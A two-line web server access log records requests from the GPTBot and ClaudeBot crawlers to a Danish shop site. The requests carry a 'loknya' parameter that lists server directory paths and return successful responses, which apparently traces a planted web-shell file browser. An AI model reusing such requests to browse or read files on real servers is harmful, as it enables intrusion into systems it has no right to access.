74.7.243.235 - - [29/Jul/2026:07:29:57 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/3/2/2 HTTP/2" 200 1976 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/3/2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:07:29:57 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F6%2F9%2Fd HTTP/2" 200 1997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
